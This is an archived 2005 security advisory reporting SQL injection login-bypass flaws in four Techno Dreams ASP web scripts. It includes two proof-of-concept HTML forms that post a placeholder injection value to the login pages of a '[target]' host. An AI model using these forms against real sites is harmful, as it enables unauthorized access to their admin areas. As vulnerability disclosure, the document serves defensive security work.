Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[KAPDA::#9] Techno Dreams Scripts Vulnerabilities

from [advisory] Network Security [Permanent Link]
Subject: [KAPDA::#9] Techno Dreams Scripts Vulnerabilities
Date: 26 Oct 2005 17:15:28 -0000 
[KAPDA::#9]Techno Dreams Scripts Vulnerabilities

KAPDA New advisory

Vulnerable products : 

Techno Dreams Announcement Script
Techno Dreams Guestbook Script
Techno Dreams Mailing List Script
Techno Dreams WebDirectory Script

Vendor: http://www.t-dreams.com/

Risk: High

Vulnerability: Sql injection

Date :
--------------------
2005/10/22

About Techno Dreams Scripts
--------------------
Techno Dreams Announcement Script 

     If you have a site and want to make a section for Announcements or 

   Recent News, then you might need this script.

Techno Dreams Guestbook Script 

     It uses MS Access with ability to be upgraded into SQL. Now, we've 

   added an Admin Area for the script.

Techno Dreams Mailing List Script : 

     Let your visitors join your mailing list... and send mass emails to all 

   of this list. Very good but simple ASP script (MS Access but SQL 

   upgradeable).


Techno Dreams WebDirectory :

     Simple yet effect search engine (if we could say about it; since it's 

   look like a web directory). With some advance features like approval, 

   hits, categories, advance search, admin area, what's new, new updated, 

   and what's hot...

        Vendor`s description : http://www.t-dreams.com/downloads.asp

Discussion :
----------------
  Several scripts do not properly validate user-supplied input. A remote 

user can create specially crafted parameter values that will execute 

SQL commands on the underlying database.

Vulnerabilities:
--------------------
Sql injection in /admin/login.asp (Announcement - Guestbook - 

WebDirectory)

Sql injection in /login.asp ( Mailing List)

at parameter named 'userid'. Attacker can enter SQL command to

 login as low-level user.(For all products)

Proof of Concepts:
--------------------

<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script 
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/";> Kapda - Security Science Researchers 
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/admin/login.asp";>
<input type="hidden" name="userid" value="[SQL Injection]">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s 
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/";> Kapda - Security Science Researchers 
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/login.asp";>
<input type="hidden" name="userid" value="[SQL Injection}">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

Solution:
--------------------
No patch`s released yet by vendor.

More Detail:
--------------------
http://www.kapda.ir/advisory-103.html
Visit Above Link for more details.


Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
(PersianHacker.NET)
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [KAPDA::#9] Techno Dreams Scripts Vulnerabilities, advisory <=
Previous by Date:  [Full-disclosure] Update for the magic byte bug, Andrey Bayora
Next by Date:  Re: Mozilla Thunderbird SMTP down-negotiation weakness, Tony Finch
Previous by Thread:  [Full-disclosure] Update for the magic byte bug, Andrey Bayora
Next by Thread:  MDKSA-2005:193-1 - Updated ethereal packages fix multiple vulnerabilities, Mandriva Security Team
Indexes:  [Date] [Thread] [Top] [All Lists]